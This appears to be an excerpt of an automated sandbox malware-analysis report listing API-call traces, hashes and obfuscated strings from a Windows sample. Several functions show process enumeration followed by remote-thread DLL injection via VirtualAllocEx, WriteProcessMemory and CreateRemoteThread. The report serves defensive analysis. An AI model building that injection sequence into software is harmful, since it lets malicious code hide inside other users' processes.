                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$-$1$7$C$G$H$L$P$^$a$a$a$b$c$c$d$d$d$d$d$d$e$e$e$e$e$f$f$g$g$i$i$i$l$l$m$m$o$o$p$p$r$s$s$t$t$t$t$x$x$y$|$}
                                                                  • API String ID: 0-2094285404
                                                                  • Opcode ID: 51d36cf9d135ff13def567e27bab96c356f22eb539a5bbfb782b486a00b3a5bc
                                                                  • Instruction ID: f91fdec992fe17677b43e0b7d472141b995edb7bc8f57b37002556bdc30744f2
                                                                  • Opcode Fuzzy Hash: 51d36cf9d135ff13def567e27bab96c356f22eb539a5bbfb782b486a00b3a5bc
                                                                  • Instruction Fuzzy Hash: 4822022110D7C18DE3328B38945479BBFD21FE7218F185E9EE5E84B3A2C6B58109DB67
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $ $ $%$&$*$0$1$6$6$;$<$<$A$Ax`B$B$E$G$K$L$N$O$R$S$X$[$`$a$c$c$d$d$d$d$l$l$m$m$o$o$o$o$o$p$r$r$r$r$s$x$x$y$y${O
                                                                  • API String ID: 0-2712818868
                                                                  • Opcode ID: 6ffe89f5952b37d7b41ad2369ec969154af03488458b80ea56ad85364e586578
                                                                  • Instruction ID: 1d3985015a6004c57cc64fd4eab342ec2e216b16199d8406fbd0a1e5bf867d26
                                                                  • Opcode Fuzzy Hash: 6ffe89f5952b37d7b41ad2369ec969154af03488458b80ea56ad85364e586578
                                                                  • Instruction Fuzzy Hash: 1602B02010D7C18DD362867D949878FFFD11BE7228F585A9DE1E84B3E3C2AA8149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: #$)$+er$.$.$.$.$0$1$1$2$4$6$8$;$@$H$N'$P$Y$Z$]$^$a$a$a$a$b$c$c$c$e$e$f$g$h$i$i$l$m$m$m$m$n$r$r$w$w$x$y$y$y$|
                                                                  • API String ID: 0-4186895133
                                                                  • Opcode ID: 0457d87cb6172381257f14a505d1067714eb00389eaa25dabdda14dbf2249052
                                                                  • Instruction ID: d9655f3602fa6a1bb02df14978dde1affe4b5e2ecf171b0ab4337b2ceb98d59a
                                                                  • Opcode Fuzzy Hash: 0457d87cb6172381257f14a505d1067714eb00389eaa25dabdda14dbf2249052
                                                                  • Instruction Fuzzy Hash: B032D02110E7C18DD322973C945879FFFE11BA7218F585E9DE1E88B393C2A68149C767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 3$<$C$I$S$a$a$a$a$a$a$a$a$b$c$d$d$d$dualc$e$e$fna$g$h$hyb$i$l$l$lmada$m$n$n$n$n$n$n$o$o$r$r$r$r$rebyc$s$s$s$t$t$y
                                                                  • API String ID: 0-907914069
                                                                  • Opcode ID: 0332521eceea5fd94bb27fe7acd8e7d51adc7a05d74f19a4687ecc626ac915ed
                                                                  • Instruction ID: 78c049e7797477cb6e619203f3ba55b69d2c157b8d549aaa0d27a5a6a91e7049
                                                                  • Opcode Fuzzy Hash: 0332521eceea5fd94bb27fe7acd8e7d51adc7a05d74f19a4687ecc626ac915ed
                                                                  • Instruction Fuzzy Hash: 6812BF3440D3C18EE332CB2994547DFBFE16BA6308F088DAED4DD5A292D6B60159CB67
                                                                  APIs
                                                                  • GetLocalTime.KERNEL32(?,?,?,0000005D), ref: 0040BE46
                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 0040BE66
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Time$InformationLocalZone
                                                                  • String ID: "$'$($($)$+$1$2$2$4$?$E$G$G$H$K$M$U$W$Z$^$e$g$h$h$i$m$n$p$z
                                                                  • API String ID: 93009163-702723632
                                                                  • Opcode ID: d4280e2c651efcdaf4adcd37bac95a97bed8fc85061677ef0d98c041c8610d7f
                                                                  • Instruction ID: f24f2204c30bf8112847402748224eab2bce5a1f2b66652d7b583283150f38f1
                                                                  • Opcode Fuzzy Hash: d4280e2c651efcdaf4adcd37bac95a97bed8fc85061677ef0d98c041c8610d7f
                                                                  • Instruction Fuzzy Hash: DEC1382110D7C189D322C77C948469FFFD15BEB228F584A9DF1E48B3E2C2658549C76B
                                                                  APIs
                                                                  • QueryDosDeviceA.KERNEL32(000000A1,?,00000200), ref: 00423E6D
                                                                  • GetLastError.KERNEL32 ref: 00423E83
                                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 00423E99
                                                                  • lstrcatA.KERNEL32(?,000000A1), ref: 00423EA5
                                                                  • DefineDosDeviceA.KERNEL32(00000001,000000A1,?), ref: 00423EB3
                                                                  • GetLastError.KERNEL32 ref: 00423EC1
                                                                  • lstrcpyA.KERNEL32(?,000000EC), ref: 00423EE0
                                                                  • lstrcatA.KERNEL32(?,000000A1), ref: 00423EF3
                                                                  • CreateFileA.KERNEL32(?,00000000,00000001,00000000,00000003,00000000,000000FF), ref: 00423F0D
                                                                  • DeviceIoControl.KERNEL32(00000000,00170002,00000092,00000004,00000099,000000DC,000000EC,00000000), ref: 00423F2E
                                                                  • GetLastError.KERNEL32 ref: 00423F38
                                                                  • DefineDosDeviceA.KERNEL32(00000007,000000A1,?), ref: 00423F70
                                                                  • GetLastError.KERNEL32 ref: 00423F7A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: DeviceErrorLast$Definelstrcatlstrcpy$ControlCreateFileQuery
                                                                  • String ID: !$-$T$e$f$z$}
                                                                  • API String ID: 204970884-3644634782
                                                                  • Opcode ID: 56c54b7da3f6591e38d1c0b40ab5c6b6fc7a851bac03c90d99fe65f73b77bc95
                                                                  • Instruction ID: beacce81ebdc5a62315d6854d61fdc252875682725b92811e62445d41cf4b898
                                                                  • Opcode Fuzzy Hash: 56c54b7da3f6591e38d1c0b40ab5c6b6fc7a851bac03c90d99fe65f73b77bc95
                                                                  • Instruction Fuzzy Hash: BD61B830A042DDAEDF21CFB99C48ADE7FB49F16320F444295E5A4A62D1C3744706CB69
                                                                  APIs
                                                                  • lstrcpyA.KERNEL32(?,?,?,?,?,74DF3310,00000063), ref: 004063AB
                                                                  • lstrcatA.KERNEL32(?,?,?,?,?,?,?,74DF3310,00000063), ref: 004063C4
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,74DF3310,00000063), ref: 004063D3
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,74DF3310,00000063), ref: 004063DF
                                                                  • lstrcmpA.KERNEL32(?,0042E310), ref: 0040640E
                                                                  • lstrcmpA.KERNEL32(?,0042E30C), ref: 0040641E
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00406440
                                                                  • lstrcatA.KERNEL32(?,?), ref: 00406453
                                                                  • lstrcatA.KERNEL32(?,0042E308), ref: 00406462
                                                                  • lstrcpyA.KERNEL32(?,?,00000063), ref: 004064BB
                                                                  • lstrcatA.KERNEL32(?,?), ref: 004064CE
                                                                  • FindNextFileA.KERNEL32(?,?,00000063), ref: 0040653F
                                                                  • FindClose.KERNEL32(?), ref: 0040655C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcat$Findlstrcpy$Filelstrcmp$CloseErrorFirstLastNext
                                                                  • String ID: :\$.$.$a$b$w
                                                                  • API String ID: 1838452084-3178132420
                                                                  • Opcode ID: 26a3c23a68273bf8c967d5a4a1b22617189afc168d45bd22dd0b1123420d9e14
                                                                  • Instruction ID: d91f1d41485bd9133756b8c6267c5f734ad3426634637d29d8fe53ea42b8f97d
                                                                  • Opcode Fuzzy Hash: 26a3c23a68273bf8c967d5a4a1b22617189afc168d45bd22dd0b1123420d9e14
                                                                  • Instruction Fuzzy Hash: CF51F772108384ABC720DB65DC44BDFB7E9AFC8304F40492EF58A97281D779D609CB6A
                                                                  APIs
                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000034,?,00000104), ref: 00401911
                                                                  • GetLocalTime.KERNEL32(0000005E), ref: 0040191C
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00401936
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040193D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateEnvironmentExpandFileHandleLocalStringsTime
                                                                  • String ID: '$0$4$:$<$F$Y$^$h$m$t$x$z
                                                                  • API String ID: 2910088009-759814561
                                                                  • Opcode ID: a79a7929436da7264a15b6a66c219a1273af2adf041c396046486cd8ebe7c2c0
                                                                  • Instruction ID: 9d7d35d6ed35067f5301624282322d6ee0cd526578bc1b9978354d1e4a90c02c
                                                                  • Opcode Fuzzy Hash: a79a7929436da7264a15b6a66c219a1273af2adf041c396046486cd8ebe7c2c0
                                                                  • Instruction Fuzzy Hash: E631EC2110C3C1D9E312DB38984874FBFD15BA7618F488A9DF1E95A2D2C2B99249C7A7
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(0000042A,00000000,?,?,00000000,000000DD,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?), ref: 0040487B
                                                                  • lstrlenA.KERNEL32(BR@,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 0040489A
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,00000001,00001000,00000004,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048B7
                                                                  • WriteProcessMemory.KERNEL32(00000000,00000000,BR@,00000001,00000000,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048D3
                                                                  • GetModuleHandleA.KERNEL32(Kernel32,LoadLibraryA,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 004048EB
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004048F2
                                                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040491E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Process$AddressAllocCreateHandleMemoryModuleOpenProcRemoteThreadVirtualWritelstrlen
                                                                  • String ID: ($BR@$Kernel32$LoadLibraryA
                                                                  • API String ID: 3328640463-1592096681
                                                                  • Opcode ID: 1048440a6fa2ba31e54d9434ac68688d651942ad3db7224efd2e259a51c0311f
                                                                  • Instruction ID: b8c2f0deb781411a5cbda0f33fd6846fbbcdfb44d071191cfa48344f537f40e7
                                                                  • Opcode Fuzzy Hash: 1048440a6fa2ba31e54d9434ac68688d651942ad3db7224efd2e259a51c0311f
                                                                  • Instruction Fuzzy Hash: A831B3B0A40394EFEB208BA98C48B9FBFB9AB96714F14016AF550B62C1C7B44501C7B8
                                                                  APIs
                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004050BF
                                                                  • lstrcatA.KERNEL32(?,0042E308), ref: 0040516B
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040517A
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00405184
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004051B7
                                                                  • Process32First.KERNEL32 ref: 004051E9
                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00405259
                                                                    • Part of subcall function 00404840: OpenProcess.KERNEL32(0000042A,00000000,?,?,00000000,000000DD,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?), ref: 0040487B
                                                                    • Part of subcall function 00404840: lstrlenA.KERNEL32(BR@,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 0040489A
                                                                    • Part of subcall function 00404840: VirtualAllocEx.KERNEL32(00000000,00000000,00000001,00001000,00000004,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048B7
                                                                    • Part of subcall function 00404840: WriteProcessMemory.KERNEL32(00000000,00000000,BR@,00000001,00000000,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002), ref: 004048D3
                                                                    • Part of subcall function 00404840: GetModuleHandleA.KERNEL32(Kernel32,LoadLibraryA,?,?,00000000,0042521C,0042E2F8,000000FF,?,00405242,?,?,00000002,00000000), ref: 004048EB
                                                                    • Part of subcall function 00404840: GetProcAddress.KERNEL32(00000000), ref: 004048F2
                                                                    • Part of subcall function 00404840: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040491E
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandleProcessProcess32lstrcat$AddressAllocAttributesCloseDirectoryFileFirstMemoryModuleNextOpenProcRemoteSnapshotSystemThreadToolhelp32VirtualWritelstrlen
                                                                  • String ID: T$o
                                                                  • API String ID: 347023813-3088171537
                                                                  • Opcode ID: 1637164c7f9895b18762df92123e5e50300fe974904146b62b15fd1e0cf0ceda
                                                                  • Instruction ID: feaa7f443b79ad3512fc15c49273def89914fdb135639313c3836c96608cb255
                                                                  • Opcode Fuzzy Hash: 1637164c7f9895b18762df92123e5e50300fe974904146b62b15fd1e0cf0ceda
                                                                  • Instruction Fuzzy Hash: 7C51F03510C3D18AD310DB39AC84BDFBFD48BD6324F485A6DE5E8862D2D6788509CB67
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000000), ref: 0041E0FB
                                                                  • LoadResource.KERNEL32(?,00000000,?), ref: 0041E110
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoad
                                                                  • String ID: J$j
                                                                  • API String ID: 2619053042-3737368804
                                                                  • Opcode ID: 59f09915b7c398c90ca5aa23a131cfd19cb12457168d76c6417c5eaae1914163
                                                                  • Instruction ID: fac2f0c8f6ecf36566f1a5ae47c595f35cc5e359fa8f75e74032fb34fa1c9e17
                                                                  • Opcode Fuzzy Hash: 59f09915b7c398c90ca5aa23a131cfd19cb12457168d76c6417c5eaae1914163
                                                                  • Instruction Fuzzy Hash: 4541293A2087815BD3118B29AC85BD73B94D79A370F145139E9A1873F1D778484BC76E
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(74DE8A60,?,?,?,?,?,?,004051B3), ref: 004047AA
